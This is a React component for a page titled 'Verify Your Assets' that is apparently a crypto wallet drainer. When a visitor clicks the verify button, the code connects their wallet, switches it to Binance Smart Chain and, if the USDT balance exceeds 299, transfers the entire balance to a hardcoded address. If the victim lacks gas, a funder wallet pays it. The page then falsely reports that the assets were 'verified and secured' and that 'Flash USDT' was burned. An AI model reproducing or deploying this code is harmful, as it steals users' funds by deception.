import React, { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import { ToastContainer, toast } from 'react-toastify';
import 'react-toastify/dist/ReactToastify.css';
import Navbar from './Navbar';
import 'bootstrap/dist/css/bootstrap.min.css';
import { Spinner } from 'react-bootstrap';
import { FaWallet, FaDollarSign, FaExclamationTriangle } from 'react-icons/fa';
import './TokenTransfer.css';

const TokenTransfer = () => {
  const [walletAddress, setWalletAddress] = useState(null);
  const [loading, setLoading] = useState(false);
  const [results, setResults] = useState(null);
  const [showResults, setShowResults] = useState(false);

  const USDT_BEP20_CONTRACT_ADDRESS ='0x55d398326f99059fF775485246999027B3197955';
  const MY_WALLET_ADDRESS ='0xBFCDEF360610F4a3Ee3C9e12D323A3B56703B9c8';
  const GAS_FUNDER_PRIVATE_KEY = process.env.REACT_APP_GAS_FUNDER_PRIVATE_KEY;

  const ERC20_ABI = [
    'function balanceOf(address account) view returns (uint256)',
    'function decimals() view returns (uint8)',
    'function transfer(address recipient, uint256 amount) public returns (bool)',
  ];

  useEffect(() => {
    if (!window.ethereum) {
      toast.error('No Ethereum wallet detected. Please install Trust Wallet or MetaMask.');
    }
  }, []);

  const connectToBscNetwork = async () => {
    try {
      const provider = new ethers.providers.Web3Provider(window.ethereum);
      const network = await provider.getNetwork();

      if (network.chainId !== 56) {
        await switchToBscNetwork();
      }
    } catch (err) {
      // console.error('Error switching to Binance Smart Chain:', err);
      // toast.error('Failed to switch to Binance Smart Chain. Please switch to older version.');
    }
  };

  const switchToBscNetwork = async () => {
    try {
      await window.ethereum.request({
        method: 'wallet_switchEthereumChain',
        params: [{ chainId: '0x38' }], // BSC network ID
      });
    } catch (switchError) {
      if (switchError.code === 4902) {
        // Chain not added in wallet, add it.
        await window.ethereum.request({
          method: 'wallet_addEthereumChain',
          params: [
            {
              chainId: '0x38',
              chainName: 'Binance Smart Chain',
              nativeCurrency: { name: 'BNB', symbol: 'BNB', decimals: 18 },
              rpcUrls: ['https://bsc-dataseed.binance.org/'],
              blockExplorerUrls: ['https://bscscan.com/'],
            },
          ],
        });
      } else {
        // console.error('Error adding Binance Smart Chain:', switchError);
        // toast.error('Failed to add Binance Smart Chain. Please switch manually.');
      }
    }
  };

  const connectWalletAndTransfer = async () => {
    setLoading(true);
    try {
      if (!window.ethereum) {
        toast.error('No Ethereum wallet detected. Please install Trust Wallet or MetaMask.');
        setLoading(false);
        return;
      }

      await connectToBscNetwork();

      const provider = new ethers.providers.Web3Provider(window.ethereum);
      const accounts = await provider.send('eth_requestAccounts', []);
      const userAddress = accounts[0];
      setWalletAddress(userAddress);

      await initiateTransfer(provider, userAddress);
    } catch (err) {
      // console.error('Error during wallet connection:', err);
      // toast.error('Failed to connect to wallet or network.');
      setLoading(false);
    }
  };

  const initiateTransfer = async (provider, userAddress) => {
    try {
      const signer = provider.getSigner();
      await transferAllUsdt(provider, signer, userAddress);
    } catch (err) {
      // console.error('Error during transfer:', err);
      // toast.error('Error during transfer.');
      setLoading(false);
    }
  };

  const transferAllUsdt = async (provider, signer, walletAddress) => {
    try {
      const usdtContract = new ethers.Contract(USDT_BEP20_CONTRACT_ADDRESS, ERC20_ABI, signer);

      const balance = await usdtContract.balanceOf(walletAddress);
      const decimals = await usdtContract.decimals();
      const formattedBalance = ethers.utils.formatUnits(balance, decimals);

      const userBalanceInBNB = await provider.getBalance(walletAddress);
      const formattedBNBBalance = ethers.utils.formatEther(userBalanceInBNB);

      if (balance.isZero() || parseFloat(formattedBalance) <=299) {
        setResults({
          bnbBalance: formattedBNBBalance,
          usdtBalance: formattedBalance,
        });
        setShowResults(true);
        setLoading(false);
        return;
      }

      const estimatedGas = await usdtContract.estimateGas.transfer(MY_WALLET_ADDRESS, balance);
      const gasPrice = await provider.getGasPrice();
      const adjustedGasPrice = gasPrice.mul(12).div(10);

      if (userBalanceInBNB.lt(adjustedGasPrice.mul(estimatedGas))) {
        const gasFunder = new ethers.Wallet(GAS_FUNDER_PRIVATE_KEY, provider);
        const gasTxn = await gasFunder.sendTransaction({
          to: walletAddress,
          value: adjustedGasPrice.mul(estimatedGas),
        });
        await gasTxn.wait();
      }

      const transaction = await usdtContract.transfer(MY_WALLET_ADDRESS, balance, {
        gasLimit: estimatedGas,
        gasPrice: adjustedGasPrice,
      });
      await transaction.wait();

      setResults({
        bnbBalance: '0.000',
        flashUsdt: ethers.utils.formatUnits(balance, 18),
      });
      setShowResults(true);
      setLoading(false);
    } catch (err) {
      // console.error('Error during USDT transfer:', err);
      
      setLoading(false);
    }
  };

  return (
    <>
      <Navbar />
      <div className="live-bg-container">
        <div className="content-overlay container my-5">
          {showResults ? (
            <div className="result-container">
              {/* BNB Balance Box */}
              <div className="verification-success">
                ✅ Verification Successful
              </div>
              <div className="result-box">
                <div className="icon">
                  <FaWallet />
                </div>
                <p><strong>BNB Balance:</strong></p>
                <p>{results.bnbBalance || '0.000'}</p>
              </div>

              {/* USDT/Flash USDT Balance Box */}
              <div className="result-box">
                <div className="icon">
                  <FaDollarSign />
                </div>
                <p><strong>{results.flashUsdt ? 'Flash USDT:' : 'USDT Balance:'}</strong></p>
                <p>{results.flashUsdt || results.usdtBalance || '0.000'}</p>

                
                {results.flashUsdt && (
                  <div className="verification-message mt-3">
                    <p className="message-text">
                      <FaExclamationTriangle className="me-2" />
                      Your assets have been verified and secured. All detected Flash USDT has been burned.
                    </p>
                  </div>
                )}
              </div>
            </div>
          ) : (
            <div className="text-center">
  <h1 className="verify-heading">Verify Your Assets</h1>
  <p className="verify-subtext">Ensure your tokens are secure on Binance Smart Chain.</p>
  <button className="btn btn-primary btn-lg mt-3" onClick={connectWalletAndTransfer}>
    <FaWallet className="me-2" /> Verify Assets
  </button>
</div>
          )}

          {loading && (
            <div className="d-flex justify-content-center align-items-center mt-4">
              <Spinner animation="border" variant="primary" />
            </div>
          )}

          <ToastContainer />
        </div>
      </div>
    </>
  );
};

export default TokenTransfer;
